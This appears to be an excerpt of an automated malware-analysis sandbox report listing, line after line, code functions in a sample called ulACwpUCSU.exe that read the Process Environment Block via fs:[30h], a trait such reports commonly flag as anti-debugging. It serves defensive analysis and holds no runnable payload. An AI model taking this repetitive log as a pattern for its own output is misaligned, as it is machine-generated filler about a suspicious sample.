        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770443 mov eax, dword ptr fs:[00000030h]3_2_37770443
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37700445 mov eax, dword ptr fs:[00000030h]3_2_37700445
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FD454 mov eax, dword ptr fs:[00000030h]3_2_376FD454
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB420 mov eax, dword ptr fs:[00000030h]3_2_376EB420
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37727425 mov eax, dword ptr fs:[00000030h]3_2_37727425
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37727425 mov ecx, dword ptr fs:[00000030h]3_2_37727425
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777F42F mov eax, dword ptr fs:[00000030h]3_2_3777F42F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37779429 mov eax, dword ptr fs:[00000030h]3_2_37779429
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E640D mov eax, dword ptr fs:[00000030h]3_2_376E640D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF409 mov eax, dword ptr fs:[00000030h]3_2_377AF409
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37786400 mov eax, dword ptr fs:[00000030h]3_2_37786400
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37786400 mov eax, dword ptr fs:[00000030h]3_2_37786400
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A4F0 mov eax, dword ptr fs:[00000030h]3_2_3772A4F0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A4F0 mov eax, dword ptr fs:[00000030h]3_2_3772A4F0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF4FD mov eax, dword ptr fs:[00000030h]3_2_377AF4FD
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377194FA mov eax, dword ptr fs:[00000030h]3_2_377194FA
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377254E0 mov eax, dword ptr fs:[00000030h]3_2_377254E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E4EF mov eax, dword ptr fs:[00000030h]3_2_3772E4EF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E4EF mov eax, dword ptr fs:[00000030h]3_2_3772E4EF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F64F0 mov eax, dword ptr fs:[00000030h]3_2_376F64F0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377144D1 mov eax, dword ptr fs:[00000030h]3_2_377144D1
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377144D1 mov eax, dword ptr fs:[00000030h]3_2_377144D1
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F4D0 mov eax, dword ptr fs:[00000030h]3_2_3771F4D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377114C9 mov eax, dword ptr fs:[00000030h]3_2_377114C9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377884BB mov eax, dword ptr fs:[00000030h]3_2_377884BB
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F24A2 mov eax, dword ptr fs:[00000030h]3_2_376F24A2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F24A2 mov ecx, dword ptr fs:[00000030h]3_2_376F24A2
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E4BC mov eax, dword ptr fs:[00000030h]3_2_3772E4BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777D4A0 mov ecx, dword ptr fs:[00000030h]3_2_3777D4A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777D4A0 mov eax, dword ptr fs:[00000030h]3_2_3777D4A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777D4A0 mov eax, dword ptr fs:[00000030h]3_2_3777D4A0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377244A8 mov eax, dword ptr fs:[00000030h]3_2_377244A8
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772B490 mov eax, dword ptr fs:[00000030h]3_2_3772B490
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772B490 mov eax, dword ptr fs:[00000030h]3_2_3772B490
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777C490 mov eax, dword ptr fs:[00000030h]3_2_3777C490
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F0485 mov ecx, dword ptr fs:[00000030h]3_2_376F0485
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772648A mov eax, dword ptr fs:[00000030h]3_2_3772648A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772648A mov eax, dword ptr fs:[00000030h]3_2_3772648A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772648A mov eax, dword ptr fs:[00000030h]3_2_3772648A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E372 mov eax, dword ptr fs:[00000030h]3_2_3776E372
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E372 mov eax, dword ptr fs:[00000030h]3_2_3776E372
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E372 mov eax, dword ptr fs:[00000030h]3_2_3776E372
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E372 mov eax, dword ptr fs:[00000030h]3_2_3776E372
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770371 mov eax, dword ptr fs:[00000030h]3_2_37770371
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770371 mov eax, dword ptr fs:[00000030h]3_2_37770371
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771237A mov eax, dword ptr fs:[00000030h]3_2_3771237A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FB360 mov eax, dword ptr fs:[00000030h]3_2_376FB360
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772E363 mov eax, dword ptr fs:[00000030h]3_2_3772E363
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A350 mov eax, dword ptr fs:[00000030h]3_2_3772A350
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E8347 mov eax, dword ptr fs:[00000030h]3_2_376E8347
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E8347 mov eax, dword ptr fs:[00000030h]3_2_376E8347
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E8347 mov eax, dword ptr fs:[00000030h]3_2_376E8347
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE328 mov eax, dword ptr fs:[00000030h]3_2_376EE328
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE328 mov eax, dword ptr fs:[00000030h]3_2_376EE328
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE328 mov eax, dword ptr fs:[00000030h]3_2_376EE328
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3336 mov eax, dword ptr fs:[00000030h]3_2_377C3336
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37728322 mov eax, dword ptr fs:[00000030h]3_2_37728322
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37728322 mov eax, dword ptr fs:[00000030h]3_2_37728322
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37728322 mov eax, dword ptr fs:[00000030h]3_2_37728322
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771332D mov eax, dword ptr fs:[00000030h]3_2_3771332D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770E310 mov eax, dword ptr fs:[00000030h]3_2_3770E310
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770E310 mov eax, dword ptr fs:[00000030h]3_2_3770E310
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770E310 mov eax, dword ptr fs:[00000030h]3_2_3770E310
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E9303 mov eax, dword ptr fs:[00000030h]3_2_376E9303
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E9303 mov eax, dword ptr fs:[00000030h]3_2_376E9303
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772631F mov eax, dword ptr fs:[00000030h]3_2_3772631F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF30A mov eax, dword ptr fs:[00000030h]3_2_377AF30A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777330C mov eax, dword ptr fs:[00000030h]3_2_3777330C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777330C mov eax, dword ptr fs:[00000030h]3_2_3777330C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777330C mov eax, dword ptr fs:[00000030h]3_2_3777330C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777330C mov eax, dword ptr fs:[00000030h]3_2_3777330C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377233D0 mov eax, dword ptr fs:[00000030h]3_2_377233D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377743D5 mov eax, dword ptr fs:[00000030h]3_2_377743D5
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377243D0 mov ecx, dword ptr fs:[00000030h]3_2_377243D0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F63CB mov eax, dword ptr fs:[00000030h]3_2_376F63CB
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EC3C7 mov eax, dword ptr fs:[00000030h]3_2_376EC3C7
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE3C0 mov eax, dword ptr fs:[00000030h]3_2_376EE3C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE3C0 mov eax, dword ptr fs:[00000030h]3_2_376EE3C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EE3C0 mov eax, dword ptr fs:[00000030h]3_2_376EE3C0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776C3B0 mov eax, dword ptr fs:[00000030h]3_2_3776C3B0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F93A6 mov eax, dword ptr fs:[00000030h]3_2_376F93A6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F93A6 mov eax, dword ptr fs:[00000030h]3_2_376F93A6
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771A390 mov eax, dword ptr fs:[00000030h]3_2_3771A390
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771A390 mov eax, dword ptr fs:[00000030h]3_2_3771A390
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771A390 mov eax, dword ptr fs:[00000030h]3_2_3771A390
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F1380 mov eax, dword ptr fs:[00000030h]3_2_376F1380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3770F380 mov eax, dword ptr fs:[00000030h]3_2_3770F380
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778327E mov eax, dword ptr fs:[00000030h]3_2_3778327E
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AD270 mov eax, dword ptr fs:[00000030h]3_2_377AD270
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB273 mov eax, dword ptr fs:[00000030h]3_2_376EB273
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB273 mov eax, dword ptr fs:[00000030h]3_2_376EB273
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EB273 mov eax, dword ptr fs:[00000030h]3_2_376EB273
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776D250 mov eax, dword ptr fs:[00000030h]3_2_3776D250
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776D250 mov ecx, dword ptr fs:[00000030h]3_2_3776D250
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C mov eax, dword ptr fs:[00000030h]3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C mov eax, dword ptr fs:[00000030h]3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C mov eax, dword ptr fs:[00000030h]3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B124C mov eax, dword ptr fs:[00000030h]3_2_377B124C
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3771F24A mov eax, dword ptr fs:[00000030h]3_2_3771F24A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF247 mov eax, dword ptr fs:[00000030h]3_2_377AF247
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37710230 mov ecx, dword ptr fs:[00000030h]3_2_37710230
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770227 mov eax, dword ptr fs:[00000030h]3_2_37770227
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770227 mov eax, dword ptr fs:[00000030h]3_2_37770227
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_37770227 mov eax, dword ptr fs:[00000030h]3_2_37770227
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A22B mov eax, dword ptr fs:[00000030h]3_2_3772A22B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A22B mov eax, dword ptr fs:[00000030h]3_2_3772A22B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772A22B mov eax, dword ptr fs:[00000030h]3_2_3772A22B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777B214 mov eax, dword ptr fs:[00000030h]3_2_3777B214
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3777B214 mov eax, dword ptr fs:[00000030h]3_2_3777B214
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EA200 mov eax, dword ptr fs:[00000030h]3_2_376EA200
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E821B mov eax, dword ptr fs:[00000030h]3_2_376E821B
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376ED2EC mov eax, dword ptr fs:[00000030h]3_2_376ED2EC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376ED2EC mov eax, dword ptr fs:[00000030h]3_2_376ED2EC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377002F9 mov eax, dword ptr fs:[00000030h]3_2_377002F9
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E72E0 mov eax, dword ptr fs:[00000030h]3_2_376E72E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376FA2E0 mov eax, dword ptr fs:[00000030h]3_2_376FA2E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F82E0 mov eax, dword ptr fs:[00000030h]3_2_376F82E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F82E0 mov eax, dword ptr fs:[00000030h]3_2_376F82E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F82E0 mov eax, dword ptr fs:[00000030h]3_2_376F82E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F82E0 mov eax, dword ptr fs:[00000030h]3_2_376F82E0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377132C5 mov eax, dword ptr fs:[00000030h]3_2_377132C5
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB2BC mov eax, dword ptr fs:[00000030h]3_2_377CB2BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB2BC mov eax, dword ptr fs:[00000030h]3_2_377CB2BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB2BC mov eax, dword ptr fs:[00000030h]3_2_377CB2BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377CB2BC mov eax, dword ptr fs:[00000030h]3_2_377CB2BC
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376E92AF mov eax, dword ptr fs:[00000030h]3_2_376E92AF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377B92AB mov eax, dword ptr fs:[00000030h]3_2_377B92AB
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377AF2AE mov eax, dword ptr fs:[00000030h]3_2_377AF2AE
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377142AF mov eax, dword ptr fs:[00000030h]3_2_377142AF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377142AF mov eax, dword ptr fs:[00000030h]3_2_377142AF
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EC2B0 mov ecx, dword ptr fs:[00000030h]3_2_376EC2B0
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3776E289 mov eax, dword ptr fs:[00000030h]3_2_3776E289
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3774717A mov eax, dword ptr fs:[00000030h]3_2_3774717A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3774717A mov eax, dword ptr fs:[00000030h]3_2_3774717A
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376F6179 mov eax, dword ptr fs:[00000030h]3_2_376F6179
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772716D mov eax, dword ptr fs:[00000030h]3_2_3772716D
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EA147 mov eax, dword ptr fs:[00000030h]3_2_376EA147
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EA147 mov eax, dword ptr fs:[00000030h]3_2_376EA147
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_376EA147 mov eax, dword ptr fs:[00000030h]3_2_376EA147
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3157 mov eax, dword ptr fs:[00000030h]3_2_377C3157
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3157 mov eax, dword ptr fs:[00000030h]3_2_377C3157
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3157 mov eax, dword ptr fs:[00000030h]3_2_377C3157
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_377C3157 mov eax, dword ptr fs:[00000030h]3_2_377C3157
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3772415F mov eax, dword ptr fs:[00000030h]3_2_3772415F
        Source: C:\Users\user\Desktop\ulACwpUCSU.exeCode function: 3_2_3778314A mov eax, dword ptr fs:[00000030h]3_2_3778314A
